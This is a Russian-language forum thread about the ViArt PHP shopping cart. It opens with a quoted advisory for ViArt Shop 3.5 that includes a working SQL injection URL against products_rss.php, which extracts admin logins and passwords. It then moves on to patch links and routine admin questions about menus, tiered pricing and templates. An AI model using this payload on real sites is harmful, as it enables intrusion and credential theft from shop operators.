ViArt PHP Shoping cart

Статус
В этой теме нельзя размещать новые ответы.
...Эксплоит:
/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*

вы не знаете, исправили? или после 3.5 ничего не выходило?
Не знаю какая дата появления этой публикации, но разработчики всегда оперативно реагируют на такие вещи и сразу выходят патчи.
Вот сообщение о патче ещё в августе:
_http://www.viart.com/another_critical_sql_injection_security_fix_for_version_3_5.html
А вот ещё недавнее предупреждение и советы как обезопасить магазин:
_http://www.viart.com/security_alert_hack_attempts_for_version_3_5.html
 
Программа: ViArt Shop 3.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием products_rss.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*


вы не знаете, исправили? или после 3.5 ничего не выходило?

Ну возьми да попробуй на своем сайте, выполнить ту строчку и посмотри, что будет, если тебе непонятно, что она должна сделать, объясняю, она запрашивает имя и пароль администратора.
 
Теперь моя очередь спросить:)...
Кто пользует этот скрипт, объясните назначение в админке раздела Модули CMS > Custom Menus. Я создавал там меню, но так и не понял его назначение и где его выводить:nezn:... По этой причине не делал перевод этой части.
 
До банальности просто, что бы можно было сделать вертикальное меню например, или меню с группами товаров;)
А выводится оно как обычный модуль.
 
А можно как то вывести переключение Detailed Listing и Table View на главную страницу сайта, что бы пользователи могли сами переключать?
 
Есть ли возможность одному продукту задать несколько типов цены, к примеру:
продукт1 кол-во от 1 до 10 цена 100р
от 11 до 20 цена 180р
от 21 до 30 цена 160р
и т.д.
Именно чтобы не забивать несколько продуктов с одним названием а присвоить это к одному продукту и взависимости от запрашиваемого кол-ва автоматом ставилась нужная цена?
 
Есть ли возможность одному продукту задать несколько типов цены, к примеру:
продукт1 кол-во от 1 до 10 цена 100р
от 11 до 20 цена 180р
от 21 до 30 цена 160р
и т.д.
Именно чтобы не забивать несколько продуктов с одним названием а присвоить это к одному продукту и взависимости от запрашиваемого кол-ва автоматом ставилась нужная цена?
Легко... Для этого открывам список товаров для редактирования и видим рядом с названием товара в списке:
Редактировать
Цены | Изображения | Опции и Компоненты | Спецификация |

Нас интересуют Цены, жмём и настраиваем как хочется, настраивая цену за товар в зависимости от кол-ва в абсолютной величине или в %. К примеру, базовая цена за 1 шт. товара =40. Пишем кол-во от 1 до 10=40; от 11 до 20=30; от 21 до 30=20 и.т.п. Выставляем все настройки и сохраняем. если предполагается кол-во более 10, то идём в
Товары > Настройки товаров и в Общих настройках выбираем в Выбор кол-ва (Элемент управления используемый для изменения количества товаров), текстбокс, если стояло другое, чтобы пользователь мог вписать кол-во с клавиатуры. Сохраняем.. Идём на страницу товара и видим появившуюся табличку, рядом с ценой, с указанием, сколько будет стоить товар в зависимоти от кол-ва заказанного...
 
Где можно шаблончики найти для viarta? есплатные ессно :)
 
Где можно шаблончики найти для viarta? есплатные ессно :)
Думаю, что нигде... Я, не имея особых познаний, переделал по желанию заказчика один из стандартных, идущих в комплекте за 2 вечера. Оказалось не трудно, там шаблоны задаются в файлах стилей в папке styles (ищешь одноимённый файл с названием шаблона, которых хочешь переделать) и рисунки, логотипы и прочая графика в одноимённой с названием шаблона папке в images.
 
Сегодня понял чего мне очень не хватает в этом магазине. На странице списка товара у меня вверху расположен блок описания категории "Товары (Category info)". Было бы просто отлично, если бы там можно было размещать дополнительные изображения, так же как выводятся дополнительные изображения для товара. Попробую на днях подправить код, но с моим "глубокими" познаниями РHP не факт, что получится :)
Пока приходиться изощеряться и в списке товаров категории вносить товар "Название категории - фото", там уже размещать фотографии и отключать кнопку "Добавить в корзину". Но часть клиентов даже не догадывается, что можно там посмотреть дополнительные фотографии.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху